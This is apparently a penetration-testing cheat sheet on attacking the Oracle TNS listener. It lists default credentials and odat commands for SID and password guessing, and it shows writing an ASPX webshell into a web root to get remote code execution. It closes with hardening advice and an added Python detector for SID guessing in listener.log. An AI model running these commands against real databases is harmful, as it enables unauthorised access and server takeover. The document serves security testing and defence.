Oracle TNS
aka Oracle Database, TNS listener
Oracle database listener on 1521. Guess the SID and default creds, then odat turns access into file read/write and RCE; UTL_FILE drops a webshell.
Ports
| Port | Proto | Notes |
|---|---|---|
| 1521 | tcp | Oracle TNS listener |
Fingerprint
- nmap oracle-tns-version / oracle-sid-brute
- A SID is required to connect; enumerate it first
Key files
| Path | Holds | Sensitive |
|---|---|---|
| tnsnames.ora / listener.ora | service names and listener config | |
| $ORACLE_HOME data files | the database itself | |
Default / weak creds
scott / tiger, system / manager, sys / change_on_install (classic defaults)
Service users
oracle
Exploitation primitives
- odat all -s <TARGET> runs SID guessing, password guessing and exploitation
- With a login: read/write files via UTL_FILE, write a webshell into the web root
- DBMS_SCHEDULER / external procedures (EXTPROC) for OS command execution
Overview
The Oracle listener on 1521 will not accept a connection without a valid SID. Once the SID and a credential are enumerated (defaults are common), odat automates the rest, including file write and command execution.
Enumeration and attack
odat sidguesser -s <TARGET> -p 1521
odat passwordguesser -s <TARGET> -p 1521 -d <SID>
sqlplus scott/tiger@<TARGET>:1521/<SID>
odat utlfile -s <TARGET> -d <SID> -U user -P pass --putFile C:\\inetpub\\wwwroot shell.aspx ./shell.aspx
Hardening
Change default credentials, restrict listener access, set a listener password, and remove unused external procedures.
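Listener-side detection of the SID guessing shown under Enumeration, as an added example (not part of the original page or of odat): it counts the distinct unknown SIDs or service names each source address requested in listener.log. The log layout, the sample lines, the addresses and the threshold are assumptions constructed for illustration.

```python
import re
from collections import defaultdict

# Assumed classic text listener.log layout (fields separated by " * "):
# TIMESTAMP * CONNECT_DATA * PROTOCOL_INFO * EVENT * SID * RETURN_CODE
FAILED_LOOKUP = {"12505", "12514"}  # TNS-12505 unknown SID, TNS-12514 unknown service
SRC = re.compile(r"\(ADDRESS=\(PROTOCOL=tcp\)\(HOST=([^)]+)\)", re.I)


def sid_guess_sources(log_text, threshold=3):
    """Return {source_ip: sorted names} for sources that requested at least
    `threshold` different SIDs/service names the listener did not know."""
    tried = defaultdict(set)
    for line in log_text.splitlines():
        fields = [f.strip() for f in line.split(" * ")]
        if len(fields) < 6 or fields[-3] != "establish":
            continue  # not a connection attempt (status, service_update, ...)
        src = SRC.search(fields[2])
        if src and fields[-1] in FAILED_LOOKUP:
            tried[src.group(1)].add(fields[-2].upper())
    return {ip: sorted(names) for ip, names in tried.items()
            if len(names) >= threshold}


def _sample_line(time, sid, ip, code):
    # Builds one constructed log line; every value here is made up.
    return (f"12-MAR-2024 {time} * (CONNECT_DATA=(SID={sid})(CID=(PROGRAM=client)"
            f"(HOST=ws)(USER=u))) * (ADDRESS=(PROTOCOL=tcp)(HOST={ip})(PORT=40000))"
            f" * establish * {sid} * {code}")


SAMPLE_LOG = "\n".join([
    _sample_line("10:15:01", "ORCL", "10.0.0.20", 0),       # normal login
    _sample_line("10:15:09", "ORCLL", "10.0.0.20", 12505),  # single typo
    _sample_line("10:16:40", "XE", "10.0.0.66", 12505),     # burst of guesses
    _sample_line("10:16:40", "PROD", "10.0.0.66", 12505),
    _sample_line("10:16:41", "TEST", "10.0.0.66", 12505),
    _sample_line("10:16:41", "ORCL1", "10.0.0.66", 12505),
])

if __name__ == "__main__":
    for ip, names in sid_guess_sources(SAMPLE_LOG).items():
        print(f"possible SID guessing from {ip}: {len(names)} unknown names {names}")
```

A source that mistypes one SID stays under the threshold; tune the threshold and add a time window to match the environment's normal client behaviour.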